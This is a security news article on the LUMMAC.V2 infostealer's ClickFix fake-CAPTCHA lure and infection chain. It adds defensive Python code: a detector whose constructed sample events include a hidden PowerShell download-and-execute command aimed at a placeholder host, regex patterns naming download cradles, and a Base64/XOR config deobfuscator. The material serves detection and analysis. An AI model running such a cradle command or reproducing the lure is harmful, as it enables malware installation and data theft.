LUMMAC.V2 Stealer Uses ClickFix Technique to Deceive Users into Executing Malicious Commands

The LUMMAC.V2 infostealer malware, also known as Lumma or Lummastealer, has emerged as a significant threat, employing the cunning “ClickFix” social engineering technique to compromise unsuspecting users.

This malware, rewritten from C to C++ with an advanced binary morpher, targets a broad spectrum of sensitive data, including credentials, emails, personal details, screenshots, and cookies from browsers, crypto wallets, password managers, and more.

Distributed through deceptive means, LUMMAC.V2 tricks users into executing malicious commands by presenting fake CAPTCHA verification pages that prompt them to open the Windows Run dialog box, paste a pre-copied command, and execute it.

[Figure: Source code of the fake CAPTCHA page]

This initiates a hidden PowerShell payload, setting off a complex infection chain that can devastate personal and system security.

Multi-Stage Infection Chain and Stealthy Execution

The infection typically begins with seemingly innocent internet searches for cracked software, movies, or music, where malicious links redirect users to fraudulent CAPTCHA pages.

Once the user follows the deceptive instructions, a PowerShell command downloads a malicious script from a remote server, typically launched with the -W Hidden parameter so that no console window appears and the victim sees nothing.

According to the Google report, this script, such as the one fetching a file named pnk3.txt, orchestrates the download of a ZIP archive containing the malware, extracts it to the user’s AppData folder, and executes a disguised executable like Perspective.exe.

For persistence, LUMMAC.V2 adds registry entries to ensure it runs on system startup.
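The chain described above leaves two telemetry traces a defender can key on: a hidden-window PowerShell process whose parent is explorer.exe (the Run dialog is hosted by the shell) carrying a download cradle, and a Run-key value pointing into the user's AppData folder. The following detection logic is an added example, not code from the Google report or this article; the Sysmon-style event records are constructed samples, and the host name c2-placeholder.invalid is a placeholder.

```python
import re
from typing import Dict, Iterable, List, Tuple

# Constructed Sysmon-style events (Event ID 1 = process create, 13 = registry value set).
# Made-up samples for this example, not telemetry from the report.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"event_id": "1", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r'powershell -W Hidden -c "iwr http://c2-placeholder.invalid/pnk3.txt | iex"'},
    {"event_id": "1", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "command_line": r"notepad.exe C:\Users\alice\notes.txt"},
    # Hidden PowerShell launched by an automation agent, not by the shell: benign here.
    {"event_id": "1", "parent_image": r"C:\Program Files\Build\agent.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell -W Hidden -File C:\Build\deploy.ps1"},
    {"event_id": "13",
     "target_object": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\Perspective",
     "details": r"C:\Users\alice\AppData\Roaming\Perspective\Perspective.exe"},
    # Legitimate Run value under a system path: not flagged.
    {"event_id": "13",
     "target_object": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SecurityHealth",
     "details": r"%windir%\system32\SecurityHealthSystray.exe"},
]

# -W Hidden and its long/abbreviated spellings (PowerShell accepts parameter prefixes).
HIDDEN_WINDOW = re.compile(r"(?i)(?:^|\s)-w(?:indowstyle)?\s+h(?:idden)?\b")
# Common download-and-execute cradle tokens.
DOWNLOAD_CRADLE = re.compile(
    r"(?i)\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|net\.webclient|curl)\b")
# Persistence written under a user's AppData tree, as the article describes.
USER_APPDATA_PATH = re.compile(r"(?i)\\users\\[^\\]+\\appdata\\")
RUN_KEY = re.compile(r"(?i)\\software\\microsoft\\windows\\currentversion\\run(?:once)?\\")
SHELL_CHILDREN = ("powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe")


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def detect_clickfix_chain(events: Iterable[Dict[str, str]]) -> List[Tuple[str, str]]:
    """Return (finding_type, evidence) pairs for events matching the ClickFix chain."""
    findings: List[Tuple[str, str]] = []
    for ev in events:
        if ev["event_id"] == "1":
            cmd = ev["command_line"]
            # Run-dialog execution shows up as explorer.exe spawning the interpreter.
            if (_basename(ev["parent_image"]) == "explorer.exe"
                    and _basename(ev["image"]) in SHELL_CHILDREN
                    and HIDDEN_WINDOW.search(cmd)
                    and DOWNLOAD_CRADLE.search(cmd)):
                findings.append(("clickfix_execution", cmd))
        elif ev["event_id"] == "13":
            if RUN_KEY.search(ev["target_object"]) and USER_APPDATA_PATH.search(ev["details"]):
                findings.append(("run_key_persistence", ev["target_object"]))
    return findings


if __name__ == "__main__":
    for kind, evidence in detect_clickfix_chain(SAMPLE_EVENTS):
        print(f"{kind}: {evidence}")
```

The same logic applies to Windows Security event 4688 once command-line auditing is enabled. For incident responders, the command the victim pasted is also recorded in the user's RunMRU key (HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU), which is worth collecting when a ClickFix lure is suspected.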

[Figure: Extraction of the injected payload]

The malware employs varied delivery mechanisms, including DLL hijacking, where a legitimate program loads a malicious DLL like tak_deco_lib.dll, process hollowing to inject code into trusted processes such as BitlockerToGo.exe, and AutoIt-based droppers that use obfuscated scripts to evade detection.

These techniques highlight the malware’s sophistication, as it masks its activities within legitimate processes and employs anti-analysis checks to thwart security tools.

Data Exfiltration and Robust C2 Communication

Once deployed, LUMMAC.V2 establishes communication with its command-and-control (C2) servers through persistent DNS queries and TLS v1.2 connections, often masked by Cloudflare’s reverse proxy services to obscure the true server locations.

After confirming server availability with a heartbeat signal (act=life), it retrieves configuration data obfuscated with Base64 encoding and XOR, later staging sensitive information like cryptocurrency wallet data and browser files for exfiltration via HTTP POST requests.
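Layered Base64-plus-XOR obfuscation of the kind mentioned above is cheap to strip once an analyst has the blob. The routine below is an added example, not the stealer's actual scheme or code from the report: it assumes a single-byte XOR key applied before Base64 encoding and a JSON configuration (the sample config, key and host name are constructed), and recovers the key by trying all 256 candidates and keeping the one that yields a parseable JSON object.

```python
import base64
import json
from itertools import cycle
from typing import Optional


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; applying it twice with the same key restores the input."""
    if not key:
        raise ValueError("key must not be empty")
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def obfuscate_config(plaintext: str, key: bytes) -> str:
    """XOR first, then Base64, producing an ASCII-safe blob (constructed sample format)."""
    return base64.b64encode(xor_bytes(plaintext.encode("utf-8"), key)).decode("ascii")


def deobfuscate_config(blob: str, key: bytes) -> str:
    """Peel the Base64 layer, then the XOR layer, to recover the configuration text."""
    raw = base64.b64decode(blob, validate=True)
    return xor_bytes(raw, key).decode("utf-8")


def recover_single_byte_key(blob: str) -> Optional[int]:
    """Brute-force a one-byte XOR key: the right key decodes to a JSON object."""
    raw = base64.b64decode(blob, validate=True)
    for candidate in range(256):
        try:
            text = xor_bytes(raw, bytes([candidate])).decode("utf-8")
            if isinstance(json.loads(text), dict):
                return candidate
        except (UnicodeDecodeError, json.JSONDecodeError):
            continue
    return None


# Constructed sample configuration and key; the real stealer's format and key are not on the page.
SAMPLE_KEY = b"\x5a"
SAMPLE_CONFIG = '{"c2": ["c2-placeholder.invalid"], "targets": ["wallets", "browsers"]}'
SAMPLE_BLOB = obfuscate_config(SAMPLE_CONFIG, SAMPLE_KEY)


if __name__ == "__main__":
    key = recover_single_byte_key(SAMPLE_BLOB)
    print(f"recovered key: {key:#04x}")
    print(deobfuscate_config(SAMPLE_BLOB, bytes([key])))
```

The brute-force step works because a valid JSON object must start with an opening brace, so only the correct key survives json.loads; a longer repeating key would need the same idea applied per key position, which is the usual next step when a one-byte search fails.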

The malware’s ability to request additional payloads or instructions underscores its adaptability and the ongoing risk it poses post-infection.

Targeting an extensive list of applications and personal files, LUMMAC.V2 exemplifies the escalating danger of infostealer malware in today’s digital landscape, urging users to exercise caution with online interactions and maintain robust security defenses against such stealthy threats.

As cybercriminals refine their tactics, awareness and proactive measures remain critical to countering the insidious reach of threats like LUMMAC.V2, which exploit human curiosity and trust to devastating effect.
